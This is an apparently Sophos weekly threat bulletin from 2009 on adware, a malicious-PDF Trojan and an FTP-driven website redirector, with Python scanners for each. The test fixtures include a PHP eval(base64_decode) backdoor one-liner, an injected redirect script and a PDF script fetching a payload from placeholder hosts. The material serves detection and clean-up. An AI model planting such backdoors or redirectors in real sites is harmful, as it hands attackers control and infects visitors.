Threat Spotlight for the week ending November 20, 2009
- Unwanted application changes search engine settings
- Trojan hides malicious code in fake PDF file
- Redirect script exploits weak FTP credentials to hijack websites
Unwanted application changes search engine settings
Potentially unwanted application: SearchSettings
| Who is at risk?: | Windows users |
| How to get rid of it: | If you've received an alert for a blocked PUA or adware and decide that the application is not suitable for your workplace, then follow the instructions for removing PUAs. |
About this threat:
SearchSettings is a potentially unwanted application (PUA) that redirects browser search traffic by changing the default search engine, the address-bar search provider and the default error page. It may also monitor these settings and restore its own values if the user resets them.
SearchSettings may be installed by third-party toolbars, including Widgi Toolbar and Dealio.
SearchSettings usually installs itself in the folder <Program Files>\Search Settings and then typically creates files such as:
<Program Files>\Search Settings\SearchSettings.exe
<Program Files>\Search Settings\kb128\SearchSettings.dll
<Program Files>\Search Settings\kb128\SearchSettingsRes409.dll
The PUA sets this registry entry to start SearchSettings automatically on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SearchSettings
<Program Files>\Search Settings\SearchSettings.exe
It also sets registry entries in these locations:
HKCU\Software\Search Settings
HKLM\SOFTWARE\Search Settings
HKCR\SearchSettings.BHO
HKCR\SearchSettings.BHO.1
HKCR\TypeLib\{CD082CCA-086F-4FD8-8FD7-247A0DBBD1CC}
HKCR\CLSID\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}
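The file and registry indicators above can be checked without touching the live registry: export the relevant keys on the suspect machine with reg.exe (for example `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg`, which writes UTF-16LE text) and scan the export offline. The script below is an added example written for this page, not a Sophos tool; it parses .reg text, matches the key paths and the Run value listed in this write-up, and runs against a constructed export. The InprocServer32 subkey in the sample is an assumption about how the BHO DLL would be registered, not something the write-up states.

```python
import re

# Identifiers from the write-up above.
BHO_CLSID = "{E312764E-7706-43F1-8DAB-FCDD2B1E416D}"
TYPELIB_ID = "{CD082CCA-086F-4FD8-8FD7-247A0DBBD1CC}"
RUN_TARGET = r"\search settings\searchsettings.exe"   # tail of the Run value

# Key paths from the write-up, lower-cased: registry key names are
# case-insensitive, and reg.exe exports them in whatever case was used.
SUSPECT_KEYS = [
    r"hkey_current_user\software\search settings",
    r"hkey_local_machine\software\search settings",
    r"hkey_classes_root\searchsettings.bho",
    r"hkey_classes_root\searchsettings.bho.1",
    r"hkey_classes_root\typelib" + "\\" + TYPELIB_ID.lower(),
    r"hkey_classes_root\clsid" + "\\" + BHO_CLSID.lower(),
    r"hkey_local_machine\software\microsoft\windows\currentversion\explorer"
    r"\browser helper objects" + "\\" + BHO_CLSID.lower(),
]

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")                      # [KEY] or [-KEY]
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')  # "name"=data or @=data


def parse_reg_export(text):
    """Parse .reg text (the output of `reg export`, read with encoding="utf-16")
    into {key path: {value name: data}}.  REG_SZ data is unquoted and
    unescaped; other types (dword:, hex:) are kept as the raw token."""
    keys, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        m = KEY_RE.match(line)
        if m:
            current = None if m.group(1) else m.group(2)  # [-KEY] deletes a key
            if current is not None:
                keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) is None else m.group(1)
            data = m.group(2).strip()
            while data.endswith("\\") and i < len(lines):  # hex: continuation lines
                data = data[:-1] + lines[i].strip()
                i += 1
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = data
    return keys


def scan_for_searchsettings(keys):
    """Return ("key", path) for each listed key (or subkey of one) present and
    ("run", detail) for each Run value that launches SearchSettings.exe."""
    findings = []
    for path, values in keys.items():
        low = path.lower()
        if any(low == s or low.startswith(s + "\\") for s in SUSPECT_KEYS):
            findings.append(("key", path))
        if low.endswith(r"\currentversion\run"):
            for name, data in values.items():
                if RUN_TARGET in data.lower():
                    findings.append(("run", path + "\\" + name + " = " + data))
    return findings


# Constructed export for the example (not a capture from an infected machine).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"SearchSettings"="C:\\Program Files\\Search Settings\\SearchSettings.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{E312764E-7706-43F1-8DAB-FCDD2B1E416D}\InprocServer32]
@="C:\\Program Files\\Search Settings\\kb128\\SearchSettings.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32]
@="C:\\WINDOWS\\system32\\unrelated.dll"
"""

if __name__ == "__main__":
    for kind, detail in scan_for_searchsettings(parse_reg_export(SAMPLE_EXPORT)):
        print(kind, detail)
```

Matching on key prefixes rather than exact paths is deliberate: a BHO registers several subkeys under its CLSID, and a hit on any of them is enough to say the component is installed. The Run check looks at the value data, not the value name, since the name is the easy part to change.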
Trojan hides malicious code in fake PDF file
Trojan: Troj/PDFJs-EF
| Who is at risk?: | Windows users with unpatched versions of Adobe Reader or Acrobat |
| How to get rid of it: | If you've received an alert for a virus or spyware, then follow the instructions for removing the threat. |
About this threat:
Troj/PDFJs-EF is a Trojan for the Windows platform that arrives as a malicious PDF document. The PDF carries a malicious script hidden in the file's trailer section, with a further layer of encoding applied so that the code is not visible in plain view. When Adobe Reader or Acrobat runs the script, it may attempt to download a further payload from a remote website.
Troj/PDFJs-EF usually arrives in response to a PHP request made to a compromised website or to a purpose-built malicious one.
SophosLabs analysts have seen a marked increase this week in the use of this form of attack against unsuspecting web users, and strongly urge users to update Adobe Reader and Adobe Acrobat. Disabling JavaScript in Reader's preferences also removes the execution path this Trojan relies on.
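A scanner that only greps a PDF for `/JavaScript` misses exactly the two tricks described above: script kept somewhere unusual (such as the trailer) and an extra layer of encoding over it. The example below is added for this page and is not Sophos detection logic; it normalises `#xx` escapes in name tokens, inflates FlateDecode streams with zlib, and flags trailer dictionaries that carry keys the PDF specification does not define for them. The PDF it scans is constructed in `build_sample_pdf` and is not a sample of Troj/PDFJs-EF; the URL inside it is a placeholder.

```python
import re
import zlib

# Dictionary keys that carry executable behaviour in a PDF.
SUSPECT_NAMES = {b"JavaScript", b"JS", b"OpenAction", b"AA", b"Launch"}
# Keys a trailer dictionary legitimately carries (PDF 1.7, section 7.5.5).
TRAILER_KEYS = {b"Size", b"Prev", b"Root", b"Encrypt", b"Info", b"ID", b"XRefStm"}

NAME_RE = re.compile(rb"/([^\s/\[\]<>(){}%]+)")        # a PDF name token
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
TRAILER_RE = re.compile(rb"trailer\s*<<(.*?)>>", re.DOTALL)
JS_CALL_RE = re.compile(rb"\b(getURL|launchURL|submitForm|unescape|eval)\s*\(")


def decode_name(raw):
    """Undo #xx escaping in a name token: /Java#53cript -> JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def names_in(data):
    return {decode_name(n) for n in NAME_RE.findall(data)}


def inflate_streams(pdf):
    """Yield the body of every stream that inflates as zlib/Flate data."""
    for m in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates a stray EOL byte after the deflate data
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue  # not FlateDecode (or corrupt); skip it


def scan_pdf(pdf):
    """Return (where, what) findings: suspect names anywhere in the file,
    non-standard keys in any trailer dictionary, and suspect names or
    JavaScript API calls inside inflated streams."""
    findings = []
    for n in sorted(names_in(pdf) & SUSPECT_NAMES):
        findings.append(("name", n.decode()))
    for m in TRAILER_RE.finditer(pdf):
        for n in sorted(names_in(m.group(1)) - TRAILER_KEYS):
            findings.append(("trailer", n.decode()))
    for body in inflate_streams(pdf):
        for n in sorted(names_in(body) & SUSPECT_NAMES):
            findings.append(("stream-name", n.decode()))
        for call in JS_CALL_RE.findall(body):
            findings.append(("stream-js", call.decode()))
    return findings


def build_sample_pdf():
    """Constructed test file, not a Troj/PDFJs-EF sample: the catalog reaches a
    JavaScript action through #xx-escaped names, the script is Flate-compressed,
    and the trailer carries an extra /JS key.  The URL is a placeholder."""
    script = b'this.getURL("http://example.com/payload.exe");'
    body = zlib.compress(script)
    objs = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj",
        b"4 0 obj << /S /Java#53cript /JS 5 0 R >> endobj",
        (b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
         + body + b"\nendstream endobj"),
    ]
    return (b"%PDF-1.4\n" + b"\n".join(objs)
            + b"\ntrailer\n<< /Size 6 /Root 1 0 R /JS 5 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for where, what in scan_pdf(build_sample_pdf()):
        print(where, what)
```

The trailer check is the part specific to this Trojan's hiding place: anything beyond the seven keys the specification defines for a trailer dictionary has no business being there. Real samples may also use ASCIIHex, ASCII85 or chained filters, and incremental updates can leave several trailers in one file; the scanner above walks every trailer but only inflates Flate streams.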
Redirect script exploits weak FTP credentials to hijack websites
Trojan: Troj/JSRedir-AE
| Who is at risk?: | Windows users |
| How to get rid of it: | Please follow the instructions for removing Trojans. |
| For more information: | Gumblar revisited |
About this threat:
Troj/JSRedir-AE is a variant of the JSRedir family that attacks unsuspecting users of compromised websites. Criminals place Troj/JSRedir-AE onto a website using stolen upload credentials—usually FTP logins. The attack has two parts.
First, attackers upload a set of scripts to the compromised site. These scripts are written in PHP—detected as Troj/PHPMod-B—and are used to insert the additional scripting into web pages hosted on the server. They can also be used by attackers to remotely manage the infection, without further need for stolen FTP credentials.
Second, the scripts inserted into web pages—detected as Troj/JSRedir-AE—redirect visiting web browsers to other sites that host malicious content.
Troj/JSRedir has been used similarly in the past, notably during the Gumblar attack in May 2009.
SophosLabs recommends using a more secure protocol than FTP, which sends credentials in clear text, for uploading content to your web server: secure copy (SCP) or SFTP (the SSH File Transfer Protocol, not FTP over SSL), with strong passwords. If a site has already been hit, changing the upload password alone is not enough: the uploaded PHP scripts give the attackers continued control without it, so they must be found and removed as well.
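Because the attack has two parts, a clean-up has to find both the dropped PHP scripts and the script blocks injected into existing pages. A practical way to do that is to compare the live document root against a manifest of file hashes recorded from a clean deployment, and to run content heuristics over anything new or changed. The example below is added for this page and is not Sophos detection logic or the Troj/JSRedir-AE and Troj/PHPMod-B signatures; its markers are generic ones for appended script blocks, `document.write(unescape(...))` redirectors, hidden iframes and `eval(base64_decode(...))` droppers. The site contents and manifest are constructed inline.

```python
import hashlib
import re

# Generic markers for injected redirectors and PHP droppers.  These are
# illustrative, not the detection logic for Troj/JSRedir-AE or Troj/PHPMod-B.
HTML_MARKERS = [
    ("script-after-html", re.compile(rb"</html>\s*<script", re.I)),
    ("write-unescape", re.compile(rb"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("fromcharcode-blob", re.compile(rb"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", re.I)),
    ("hidden-iframe", re.compile(
        rb"<iframe[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b"
        rb"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)),
]
PHP_MARKERS = [
    ("eval-decode", re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("remote-include", re.compile(
        rb"\b(?:include|require)(?:_once)?\s*\(?\s*[\"']https?://", re.I)),
]
WEB_EXTENSIONS = (".php", ".html", ".htm", ".js")


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def content_findings(path, data):
    """Apply the PHP markers to .php files and the HTML/JS markers to every
    web-served text file (PHP files included, since injected script lands
    in their HTML output too)."""
    low = path.lower()
    markers = list(PHP_MARKERS) if low.endswith(".php") else []
    if low.endswith(WEB_EXTENSIONS):
        markers += HTML_MARKERS
    return [(path, "content", name) for name, rx in markers if rx.search(data)]


def scan_site(files, manifest):
    """files: {relative path: bytes} as read from the docroot;
    manifest: {relative path: sha256 hex} recorded from a clean deployment.
    Returns (path, kind, detail) for new, modified, missing and suspicious files."""
    findings = []
    for path, data in sorted(files.items()):
        if path not in manifest:
            findings.append((path, "new", "not in manifest"))
        elif manifest[path] != sha256(data):
            findings.append((path, "modified", "hash mismatch"))
        findings.extend(content_findings(path, data))
    for path in sorted(set(manifest) - set(files)):
        findings.append((path, "missing", "in manifest but not on disk"))
    return findings


# Constructed site and manifest for the example.  index.html has a script
# block appended after </html>; images/.cache.php stands in for a dropped
# backdoor.  The hostname in the injected script is a placeholder.
CLEAN_INDEX = b"<html><body><h1>Welcome</h1></body></html>\n"
INJECTED_INDEX = CLEAN_INDEX + (
    b"<script>document.write(unescape('%3Cscript src=%22http://example.net/"
    b"in.php%22%3E%3C/script%3E'));</script>\n")
SAMPLE_SITE = {
    "index.html": INJECTED_INDEX,
    "about.html": b"<html><body>About us</body></html>\n",
    "js/app.js": b"function init() { return 1; }\n",
    "images/.cache.php": b"<?php eval(base64_decode($_POST['c'])); ?>\n",
}
SAMPLE_MANIFEST = {
    "index.html": sha256(CLEAN_INDEX),
    "about.html": sha256(SAMPLE_SITE["about.html"]),
    "js/app.js": sha256(SAMPLE_SITE["js/app.js"]),
}

if __name__ == "__main__":
    for finding in scan_site(SAMPLE_SITE, SAMPLE_MANIFEST):
        print(*finding)
```

The manifest comparison is the reliable half: an attacker who controls the FTP login can name a dropper anything and write the injected JavaScript however they like, but cannot make a changed file hash to its clean value. Keep the manifest off the web server, otherwise the same credentials that let the attacker modify the site let them update it too. Run the content heuristics as a second pass over anything the hash check cannot vouch for, such as upload directories that legitimately change.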